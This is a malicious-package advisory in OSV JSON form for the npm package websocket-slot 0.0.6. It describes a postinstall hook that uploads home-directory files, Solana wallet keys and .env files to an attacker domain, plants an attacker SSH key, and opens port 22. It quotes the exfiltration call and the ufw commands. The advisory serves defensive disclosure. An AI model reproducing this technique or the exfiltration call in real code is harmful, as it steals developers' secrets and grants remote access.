{"id":"MAL-2026-5530","summary":"Malicious code in websocket-slot (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c15c40b8371646f167ffa7d5a2ba2c8d0fd454ef7054eeb41807a1a3eda8e7a6)\nOn `npm install`, this package runs `node test.js` via `scripts.postinstall`, which executes the logic in `index.js`. The postinstall behavior performs three distinct installer-side attacks: (1) it recursively walks the installer's home directory (and on Windows, non-C: drives plus C:\\Users\\), matching files against a remotely-fetched pattern list, then POSTs each matched file plus username/platform metadata to `http://cloudflare-prevention.vercel.app/api/v1` via FormData (`batchUpload(found, \"http://cloudflare-prevention.vercel.app/api/v1\", success)`); (2) on Linux, `addSshKeyToUser` fetches an attacker-supplied SSH public key from `http://cloudflare-prevention.vercel.app/api/ssh-key` and appends it to `~/.ssh/authorized_keys` with mode 0600, then runs `sudo ufw enable` and `sudo ufw allow 22/tcp` to ensure inbound SSH is reachable — giving the operator persistent remote root-equivalent access to the host; (3) `from_str_1` recursively scans `process.cwd()` for `id.json` (Solana wallet keypair), `config.toml`/`Config.toml`, `env`, and `.env`, uploading each match to a sibling endpoint. Scan patterns, block patterns, and the SSH key are all fetched over plain HTTP from `cloudflare-prevention.vercel.app` — a Vercel-hosted lookalike of a Cloudflare-branded service — meaning the operator can mutate which files are exfiltrated and which key is granted SSH access at any time.\n","modified":"2026-06-10T19:31:29.207660838Z","published":"2026-06-10T18:41:52Z","database_specific":{"malicious-packages-origins":[{"sha256":"c15c40b8371646f167ffa7d5a2ba2c8d0fd454ef7054eeb41807a1a3eda8e7a6","id":"IN-MAL-2026-005292","import_time":"2026-06-10T19:23:48.620586854Z","source":"amazon-inspector","versions":["0.0.6"],"modified_time":"2026-06-10T18:41:52Z"},{"id":"IN-MAL-2026-005293","sha256":"dff2c6c0da62db10517f42af8f1e926122d31e7500e7bccbe2f41fb1fe905eb0","import_time":"2026-06-10T19:23:48.691599234Z","source":"amazon-inspector","versions":["0.0.6"],"modified_time":"2026-06-10T18:41:53Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/websocket-slot/v/0.0.6"}],"affected":[{"package":{"name":"websocket-slot","ecosystem":"npm","purl":"pkg:npm/websocket-slot"},"versions":["0.0.6"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/websocket-slot/MAL-2026-5530.json","indicators":{"domains":["cloudflare-prevention.vercel.app"],"package_integrity":[{"hashes":{"sha512_sri":"sha512-6XJ00jmf84Iec/zg+VkO7qbCCa4WL+FCoWuukGLsulodAcTAjWDbYmhBb+gByuuZAdy30GlGhAZnj4WsZK9D7g==","sha1":"c9d325aaccf45f3a2478b1c95fddac36681e7af7"},"filename":"websocket-slot-0.0.6.tgz"}],"evidence_files":[{"sha256":"79aa5a78c3be61c42af94f1d4cff38f4752c458546d1033560f5f4008ef6b127","path":"index.js","tlsh":"26f186d891772661cf7233b85a13110dfbdac13339028651b6dc86497f7b52861e2eed"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}